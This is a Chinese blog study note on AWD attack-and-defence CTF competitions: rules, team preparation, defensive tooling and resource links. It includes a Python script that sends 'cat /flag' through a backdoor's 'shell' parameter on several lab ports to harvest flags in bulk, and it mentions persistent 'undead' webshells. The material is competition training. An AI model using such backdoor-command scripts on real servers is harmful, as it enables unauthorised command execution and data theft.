第80天-红蓝对抗-AWD 模式&准备&攻防&监控&批量

最新推荐文章于 2024-08-08 07:39:41 发布
最新推荐文章于 2024-08-08 07:39:41 发布
阅读量1.2k 收藏 20
点赞数 1
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/124962034
版权

思维导图

何为AWD

比赛中每个队伍维护多台服务器,服务器中存在多个漏洞,利用漏洞攻击其他队伍可以
进行得分,修复漏洞可以避免被其他队伍攻击失分。

  • 一般分配Web服务器,服务器(多数为Linux) 某处存在flag (一般在根目录下)
  • 可能会提供一台流量分析虚拟机,可以下载流量文件进行数据分析;
  • flag在主办方的设定下每隔一定时间刷新-轮
  • 各队一般都有自己的初始分数
  • flag一旦被其他队伍拿走,该队扣除一定积分
  • 扣除的积分由获取fag的队伍均分
  • 协方会对每个队伍的服务进行check,服务宕机扣除本轮fag分数,扣除的分值由
  • 服务check正常的队伍均分
  • 一般每个队伍会给一个低权限用户,非root权限

具体规则以具体比赛规则为准,但一般大同小异。

AWD 常见比赛规则说明:

Attack With Defence,简而言之就是你既是一个 hacker,又是一个 manager。
比赛形式:一般就是一个 ssh 对应一个 web 服务,然后 flag 五分钟一轮,各队一般都有自己的初始
分数,flag 被拿会被拿走 flag 的队伍均分,主办方会对每个队伍的服务进行 check,check 不过就扣
分,扣除的分值由服务 check 正常的队伍均分。
其中一半比赛以 WEB 居多,可能会涉及内网安全,攻击和防御大部分为前期培训内容。

前期准备:

  1. 队伍分工明确
  2. 脚本工具环境完整
  3. 漏洞 POC/EXP 库完整
  4. 安全防御 WAF 及批量脚本完整

必备操作:

  1. 备份网站文件
  2. 修改数据库默认密码
  3. 修改网页登陆端一切弱密码
  4. 查看是否留有后门账户
  5. 关闭不必要端口,如远程登陆端口
  6. 使用命令匹配一句话特性
  7. 关注是否运行了“特殊”进程
  8. 权限高可以设置防火墙或者禁止他人修改本目录

演示案例:

防守—部署WAF—实现第一时间拦截部分攻击—升级后续版

最快第一时间操作,此类技术核心准备为各个环境的 WAF 部署(源码语言,比赛规则)

涉及资源:

  • https://github.com/zhl2008/awd-platform
  • https://github.com/yemoli/prepare-for-awd
  • https://github.com/leohearts/awd-watchbird
  • https://github.com/DasSecurity-HatLab/AoiAWD
  • AoiAWD-针对CTF AWD的原创轻量级防御系统 https://mp.weixin.qq.com/s/kwzJnoi2FwFhwbdxetd45A
  • AWD平台搭建 https://www.cnblogs.com/Triangle-security/p/11332223.html
  • AWD红蓝对抗资料工具 https://pan.baidu.com/s/1qR0Mb2ZdToQ7A1khqbiHuQ提取码:xiao
  • 线下AWD平台搭建以及一些相关问题解决 https://www.cnblogs.com/pureqh/p/10869327.html

防守—扫描后门—实现第一时间利用预留后门攻击—升级脚本版

最快第一时间操作,此类技术核心在于扫描源码中预留或隐藏后门

当网站服务器被入侵时,我们需要一款Webshell检测工具,来帮助我们发现webshell,进一步排查系统可能存在的安全漏洞。

防守—代码审计—实现第一时间找出源码中安全漏洞—升级漏洞库版

简要分析可能存在的安全问题,配合流量监控及代码审计后续操作(框架及非框架,源码语言,漏洞库等)进行漏洞判定

  • Seay源代码审计系统——(只支持PHP语言,单一,速度快,审计结果相对Fortify较少)
  • Fortify——(支持语言丰富,速度较慢,审计结果更多、更详细)

防守—文件监控—实现第一时间监控当前目录文件操作—升级流量监控

最快第一时间操作,在防守攻击时,实时监控当前目录文件上传删除等操作,有效防止恶意删除、上传后门等,后续可配合流量操作行为监控找出更多漏洞

img

攻击—批量 Flag—实现第一时间利用脚本批量 Flag 得分—升级模版不死马

攻击第一时间操作,写好批量获取 Flag 脚本后,预定 Flag 更新时间,实现自动获取及提交,升级后门写入及不死马等操作,实现权限维持实时获取得分。

  • 假设分析脚本,发现一个后门,针对这个后门,可以批量写脚本。

img

批量获取并提交flag

import requests


def get_flag():
    data={
        'shell':'cat /flag'
    }
    for i in range(8801,8804):
        url='http://192.168.76.156:' + str(i) + '/footer.php'
        result=requests.post(url,data=data).content.decode('utf-8')
        print(result)
        with open(r'flag.txt','a+') as f:
            f .write(result+'\n')
            f.close()

def tijiao_flag():
    for flag in open('flag.txt'):
        flag=flag.replace('\n','')
        url='http://192.168.76.156:8080/flag_file.php?token=team1&flag='+flag
        requests.get(url)

if __name__ == '__main__':
    get_flag()
    tijiao_flag()

涉及资源:

https://github.com/zhl2008/awd-platform
https://github.com/yemoli/prepare-for-awd
https://github.com/leohearts/awd-watchbird
https://github.com/DasSecurity-HatLab/AoiAWD
https://www.cnblogs.com/Triangle-security/p/11332223.html
AWD红蓝对抗资料工具 https://pan.baidu.com/s/1qR0Mb2ZdToQ7A1khqbiHuQ提取码:xiao

参考

  • https://www.cnblogs.com/zhengna/p/15775396.html
IsecNoob
关注
专栏目录
AWD----模式&准备&攻防&监控&批量
qi_SJQ_的博客
02-27 3606
1.前置知识: 1) 2)AWD 常见比赛规则说明: Attack With Defence:简而言之就是你既是一个 hacker,又是一个 manager。 比赛形式:一般就是一个 ssh 对应一个 web 服务,然后 flag 五分钟一轮,各队一般都有自己的初始分数,flag 被拿会被拿走 flag 的队伍均分,主办方会对每个队伍的服务进行 check,check 不过就扣分,扣除的分值由服务 check 正常的队伍均分。其中一半比赛以 WEB 居多,可能会涉及内网安全,当然还有pwn这些。 3)前.
awd网络攻防赛常用的不死马,超强
10-30
以上是不死马的代码,pass=R_Hacker. 采用了md5加密。
80红蓝对抗-AWD模式&准备&攻防&监控&批量
mingyqf的博客
12-31 2284
AWD模式&准备&攻防&监控&批量80-82) AWD 常见比赛规则说明: 前期准备: 必备操作: 演示案例: 涉及资源 AWD监控&不死马&垃圾包&资源库 演示案例: 涉及资源: 蓝队att&ck&IDS蜜罐&威胁情报 必备知识点: 知识点: 演示案例: 涉及资源 视频资源 80. AWD模式&准备&攻防&监控&批量80-82) AWD 常见比赛规则说明: Attack With Def.
AWD Watchbird 安装与使用教程
最新发布
gitblog_00505的博客
08-08 319
AWD Watchbird 安装与使用教程 awd-watchbirdA powerful PHP WAF for AWD项目地址:https://gitcode.com/gh_mirrors/aw/awd-watchbird 1. 项目目录结构及介绍 AWD Watchbird 的目录结构大致如下: awd-watchbird/ ├── README.md # 项目简介与说明 ├─...
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
概述 基于Django框架开发,同时kvm虚拟化和SDN技术的使用带给了使用者强大的靶机攻防体验。开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。 技术栈 python3.6 + Django 2.1.7 + 10.3.9-MariaDB or Mysql-8.0 + REST Framework 3.9.2 + xadmin + Celery + Vue 部署 基于ubuntu 18 LTS版本 安装mysql、redis 并在setting.py中配置连接信息 创建虚拟环境基于python3.6 安装requirements.txt中的依赖包,如果报下面的错误 OSError: mysql_config not found sudo
p80 红蓝对抗-AWD 模式&准备&攻防&监控&批量
weixin_43263566的博客
03-14 4083
p80 红蓝对抗-AWD 模式&准备&攻防&监控&批量
AWD:赛前准备工作以及深度脚本讲解
热门推荐
薯片薯条的博客
11-10 1万+
有幸被邀请代表学校去参加线下攻防,也就是俗称的AWD比赛。 当然,在这一方面我也只能算是小白,所以希望各位大佬在看完我写的博客以后能指正一些错误。 一.比赛介绍 AWD赛制是按照分组来进行比赛的。每组3-4人,经过不同的分工,从而实现对服务器的维护以及对其他人的服务器进行攻击。 每个服务器都会有一个提前放好的有漏洞的网站,需要进行代码审计,然后修补漏洞。 举个例子,某些参数一可以参杂系统的cmd命令上来,如果执行成功,就会获取你服务器上某个文件夹下的flag.txt的内容,一旦获取成功,就代表被攻破。 .
awd-platform(AWD攻防平台)
03-16
# AWD线下环境启动说明 by Hence Zhang @Lancet github上的项目,搬运了一下
CTF - AWD (Attack with Defense) 线上下赛 攻防平台
微风飘呀飘
05-28 5889
Ti0sAWD是由 Ti0s-Team 开发的 awd 竞技攻防平台,使用 PHP + Mysql 编写。 本程序可以作为 CTF 线上 线下比赛平台,亦可用于团队内部 AWD 模拟训练 推荐服务器 4H8G + 20G + Centos 网站架构: 前端:Materialize CSS +jQuery +部分Bootstrap,采用Html + Ajax动态刷新页面 后端:纯PHP 数据库:Mysql Awd 网络攻防竞技系统模式 基于Docker服务的Aw...
80红蓝对抗-AWD模式&准备&攻防&监控&批量1
08-03
以下是对红蓝对抗AWD模式的一些关键知识点的详细说明: 1. **比赛规则**: - AWD比赛通常涉及到SSH服务和Web服务,每五分钟更新一次flag,被夺旗的队伍会失去相应的分数。 - 主办方会对服务进行定期检查,如果...
AWD-----监控&不死马&垃圾包&资源库
qi_SJQ_的博客
02-27 4291
1.知识: AWD规则: 2.防守-----流量监控-----实时获取访问数据包流量 利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后门攻击漏洞的数据包便于后期利用 分析有后门或无后门的攻击行为数据包找到漏洞进行修复 分析到成功攻击的数据包进行自我利用,用来攻击其他队伍 安恒的awf部署比较麻烦,比赛时系统日志不太好用,因此用日志分析监控的脚本好,可以实时生成日志。 推荐项目:AWD_Hunter-master 3.攻击-----
Python-一个awd攻防比赛的裁判平台
08-10
一个awd攻防比赛的裁判平台
网络攻防比赛平台源码(AWD-platform源码).7z
06-19
一个awd攻防比赛的裁判平台。 版本:beta v2.0 开发语言:python3 + django 平台分为两个部分 裁判机 靶机 通过特定接口,来实现靶机flag与服务器的通信 搭建流程 裁判机 安装所需环境 裁判机:python3+django 全局搜索woshiguanliyuan,并修改为随机字符串,此处为管理平台地址 /untitled/urls.py path('woshiguanliyuan/',views.admin,name='admin'), path('woshiguanliyuan/table/',views.admin_table,name='admin_table'), /app/views.py if 'woshiguanliyuan' not in request.META['HTTP_REFERER']: 第31和47换为你的目录 列:("/var/www/awd_platform/app/qwe.txt","a") 修改app/management/commands/init.py,添加用户 #['用户名','用户靶机token','用户靶机token'] user=[ ['123456','FF9C92C7SDFABB71566F73422C','FF9C92C7SDFABB71566F73422C'], ['aaabbb','311F8A54SV9K6B5FF4EAB20536','311F8A54SV9K6B5FF4EAB20536'] ] 修改/app/views.py第行d89f33b18ba2a74cd38499e587cb9dcd为靶机中设置的admin_token值的md5 if('d89f33b18ba2a74cd38499e587cb9dcd'==hl.hexdigest()): 运行 python3 manage.py init python3 manage.py manage.py runserver --insecure 靶机 安装所需环境 靶机:python+requests 修改send_flag.py参数,并将其放入靶机,设权限700。 靶机 sudo python send_flag.py。 靶机生成flag脚本,send_flag.py import requests import time import random import string import hashlib token='woshiwuxudong' # 红队 baji='311F8A54SV9K6B5FF4EAB20536' def getFlag(): #return ''.join(random.sample(string.ascii_letters + string.digits, 48)) m = hashlib.md5(''.join(random.sample(string.ascii_letters + string.digits, 48)).encode(encoding="utf-8")).hexdigest() return m while(1): f=open('/flag','w') flag=getFlag() f.write(flag) data={ 'flag':flag, 'token':token, 'baji':baji, } r=requests.post('http://127.0.0.1/caipanflag/',data=data) print(r.text) f.close() time.sleep(300) 重要须知 更新作者基础上: 1.增加flag验证一次性失效性,使得每个用户都并且仅可以提交一次flag 2.增加排名情况 3.flag改为MD5 4.增加丢失flag一轮扣100分
DVMA网络攻防平台
02-06
DVMA 十分好用的测试平台。 有跨站点,SQL注入。盲注。
安恒 AWD培训资料
10-06
由于不死马写入内存,所以无法通过删除文件来停止 ⚫ 不死马运行权限为www-data,可以写一个php文件,通过kill的方式杀死不死马 AWD中多为非root用户,所以没有权限去查看apache的默认日志,也没办法直接抓包 ⚫ 所以我们只能用自己的办法去抓取流量 ⚫ Awd多数的考点都是web站的代码审计,所以其实就是获取到他人访问我们站点请求的参 数是关键 waf
该模块主要是用来ctf AWD比赛时批量提交flag时使用的.zip
08-24
该模块主要是用来ctf AWD比赛时批量提交flag时使用的.zip
第76:Python开发-内外网收集Socket&子域名&DNS1
08-03
Python可以用于SRC(Source Code Review)批量收集利用,AWD(Attacker vs Defender)批量利用获取FLAG,以及CTF(Capture The Flag)比赛中的加解密脚本编写。 **涉及的技术方向** 本次讨论的技术方向涵盖了...
蓝队----att&ck&IDS&蜜罐&威胁情报
qi_SJQ_的博客
02-27 1007
hw中各种规则都能在各种hw资料里看到,不再熬yu 蓝队涉及到的技术涉及到应急、溯源、反制、情报、写报告、了解设备等综合性知识。 1.att&ck了解: 外国文档:https://attack.mitre.org/ 视频科普:https://www.zhihu.com/zvideo/1305977738013540352 2.蜜罐技术: 免费蜜罐 HFish:https://hfish.io/ github地址:https://github.com/hacklcx/HFish 部署、使用见官方文.
红蓝对抗-awd模式
m0_61786761的博客
09-01 537
(4)ps auxww |grep shell.php 找到进程后杀掉进程。(因为删除脚本没用,已经把脚本换进去解释成opcode运行了)(1)生成一个和不死马同名的文件,修改其内容为usleep值要低于不死马。权限高可以设置防火墙或者禁止他人修改目录。(2)创建一个和不死马一样名字的文件夹。文件监控 monitor.py。安全防护waf及批量脚本完整。(3)重启PHP等web服务。seay源码审计 PHP。使用命令匹配一句话特征。搅屎棍 对抗流量检测。修改登录端一切弱密码。红蓝对抗-awd模式
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值